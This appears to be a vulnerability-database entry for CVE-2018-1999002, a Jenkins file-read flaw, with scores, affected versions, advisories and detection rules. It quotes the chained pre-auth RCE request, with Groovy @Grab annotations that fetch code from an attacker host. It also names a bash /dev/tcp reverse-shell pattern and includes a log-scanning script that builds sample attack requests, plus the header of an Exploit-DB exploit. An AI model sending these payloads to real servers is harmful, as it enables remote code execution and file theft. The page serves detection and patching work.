CVE-2018-1999002
Published 2018-07-23
Priority: P2, 75, high, 7.5 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 86.64% (99.7th percentile)
An arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework's org/kohsuke/stapler/Stapler.java that allows attackers to send crafted HTTP requests returning the contents of any file on the Jenkins master file system that the Jenkins master has access to.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | files_indicating_when_a_plugin | — | — |
| jenkins | jenkins | <= 2.121.1 | — |
| jenkins | jenkins | 2.122 – 2.132 | — |
| jenkins | jenkins_core | — | — |
| jenkins | jenkins_lts | — | — |
| jenkins | jenkins_weekly | — | — |
| oracle | communications_cloud_native_core_automated_test_suite | — | — |
Detection & IOCs (extracted from sources)
- url: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27{:s}%27,%20root=%27http://{:s}%27)%0a@Grab(group=%27package%27,%20module=%27{:s}%27,%20version=%271%27)%0aimport%20Payload;
- path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
- path: /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
- path: /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
- Detect unauthenticated or authenticated HTTP GET requests to the Jenkins Stapler framework containing path traversal patterns targeting arbitrary files on the Jenkins master filesystem.
- Alert on HTTP GET requests to /securityRealm/user/*/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile containing @GrabConfig, @GrabResolver, and @Grab annotations in the value parameter; this is the chained CVE-2019-1003000 + CVE-2018-1999002 pre-auth RCE trigger.
- Alert on HTTP GET requests to /securityRealm/user/*/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript with sandbox=true and a value parameter containing .execute(), which is indicative of sandbox bypass exploitation.
- Monitor the Jenkins master process for outbound DNS or HTTP connections to unexpected external hosts immediately following requests to the checkScriptCompile or checkScript endpoints; this indicates successful SSRF/RCE via Groovy @Grab.
- Detect creation of META-INF/services/org.codehaus.groovy.plugins.Runners on disk, which is a key artifact of the exploit's malicious JAR payload staging.
- Monitor for Jenkins processes spawning /bin/bash -c with a reverse shell payload (bash -i >& /dev/tcp/...) as a child process, indicating successful RCE.
- The exploit targets a specific combination of vulnerable plugin versions. Confirm the environment has Script Security <=1.49, Pipeline: Declarative <=1.3.4, and Pipeline: Groovy <=2.61 before treating detections as confirmed exploitation.
- CVE-2018-1999002 (arbitrary file read) affects Jenkins <=2.132 and <=2.121.1 LTS. Red Hat OpenShift Enterprise 3 was assessed as Not Affected; tune detections accordingly for containerized/OCP deployments.
- The chained pre-auth RCE requires CVE-2018-1999002 (file read) combined with CVE-2019-1003000 (sandbox bypass). Detections for the file-read path alone may not indicate full RCE; look for the combination of both endpoint accesses.
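The two request-based alerts in the list above, applied to access-log lines and grouped per client so that access to both endpoints is visible. This is an added example, not code from the original page or from any project it cites; it assumes combined-format logs written by a reverse proxy in front of Jenkins, and the function names, rule names and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, quote, unquote, urlsplit

BASE = r"^/securityRealm/user/[^/]+/descriptorByName/"
COMPILE = re.compile(BASE + r"org\.jenkinsci\.plugins\.workflow\.cps\.CpsFlowDefinition/checkScriptCompile$")
CHECK = re.compile(BASE + r"org\.jenkinsci\.plugins\.scriptsecurity\.sandbox\.groovy\.SecureGroovyScript/checkScript$")
GRAB = ("@GrabConfig", "@GrabResolver", "@Grab(")
# Assumed log layout: combined log format from a reverse proxy in front of Jenkins.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" \d{3} ')

def classify(method, target):
    """Return the name of the rule a request matches, or None."""
    if method != "GET":
        return None
    url = urlsplit(target)
    path = unquote(url.path)        # undo %-encoding that would dodge path matching
    query = parse_qs(url.query)     # parse_qs percent-decodes parameter values
    value = "\n".join(query.get("value", []))
    if COMPILE.match(path) and all(a in value for a in GRAB):
        return "grab-annotations"
    if CHECK.match(path) and "true" in query.get("sandbox", []) and ".execute()" in value:
        return "sandbox-execute"
    return None

def scan(lines):
    """Map client address -> set of rule names seen in its requests."""
    hits = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        rule = classify(m.group(2), m.group(3)) if m else None
        if rule:
            hits[m.group(1)].add(rule)
    return dict(hits)

# Constructed sample requests (documentation addresses, placeholder host and names).
_GRAB = quote("@GrabConfig(disableChecksums=true)\n@GrabResolver(name='x', root='http://repo.example.invalid')\n"
              "@Grab(group='package', module='x', version='1')\nimport Payload;", safe="")
_P = "/securityRealm/user/admin/descriptorByName/"
_T = '{} - - [10/Jan/2019:10:00:00 +0000] "GET {} HTTP/1.1" 200 120 "-" "-"'
SAMPLE = [
    _T.format("203.0.113.7", _P + "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=" + _GRAB),
    _T.format("203.0.113.7", _P + "org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=" + quote("constructed.execute()", safe="")),
    _T.format("198.51.100.4", _P + "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=" + quote("node { echo 'hi' }", safe="")),
    _T.format("198.51.100.9", "/job/build/lastBuild/api/json"),
]

if __name__ == "__main__":
    for client, rules in scan(SAMPLE).items():
        print(client, sorted(rules))
```

A client whose set contains both rule names is the higher-priority case; a single checkScriptCompile request with an ordinary script, like the third sample line, matches nothing.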
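CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vendor_redhat | — | 7.5 | HIGH | — |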
GHSA
Improper Input Validation in Jenkins
ghsa·2022-05-13
CVE-2018-1999002 [HIGH] CWE-20 Improper Input Validation in Jenkins
OSV
Improper Input Validation in Jenkins
osv·2022-05-13
CVE-2018-1999002 [HIGH] Improper Input Validation in Jenkins
Red Hat
jenkins: Flaw in the Stapler web framework allows remote unauthenticated users to read arbitrary files
vendor_redhat·2018-07-18·CVSS 7.5
CVE-2018-1999002 [HIGH] CWE-20 jenkins: Flaw in the Stapler web framework allows remote unauthenticated users to read arbitrary files
Package: jenkins (Red Hat OpenShift Enterprise 3) - Not affected
Jenkins
Jenkins Security Advisory 2018-07-18
vendor_jenkins·2018-07-18·CVSS 8.8
CVE-2018-1999001 [HIGH] Jenkins Security Advisory 2018-07-18
This advisory announces vulnerabilities in the following Jenkins deliverables:
Jenkins (core)
Descriptions
Users without Overall/Read permission can have Jenkins reset parts of global configuration on the next restart
SECURITY-897 / CVE-2018-1999001
Severity (CVS
No detection rules found.
Exploit-DB
Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution
exploitdb·2019-02-25·CVSS 7.5
CVE-2019-1003000 [HIGH] Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution
---
#!/usr/bin/env python
#
# Exploit Title : jenkins-preauth-rce-exploit.py
# Date : 02/23/2019
# Authors : wetw0rk & 0xtavian
# Vendor Homepage : https://jenkins.oi
# Software Link : https://jenkins.io/download/
# Tested on : jenkins=v2.73 Plugins: Script Security=v1.49, Pipeline: Declarative=v1.3.4, Pipeline: Groovy=v2.60,
#
# Greetz: Hima, Fr13ndzSec, AbeSnowman, Berserk, Neil
#
# Description : This exploit chains CVE-2019-1003000 and CVE-2018-1999002 for Pre-Auth Remote Code Execution in Jenkins
# Security Advisory : https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
#
# Vulnerable Plugins -
# Pipeline: Declarative Plugin up to and including 1.3.4
# Pipeline: Groovy Plugin up to and
Nuclei
Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
nuclei·CVSS 7.5
CVE-2019-1003000 [HIGH] Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
Template:
id: CVE-2019-1003000
info:
  name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
  author: sttlr
  severity: high
  description: |
    A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attacke
- https://jenkins.io/security/advisory/2018-07-18/#SECURITY-914
- https://www.exploit-db.com/exploits/46453/
- https://www.oracle.com/security-alerts/cpuapr2022.html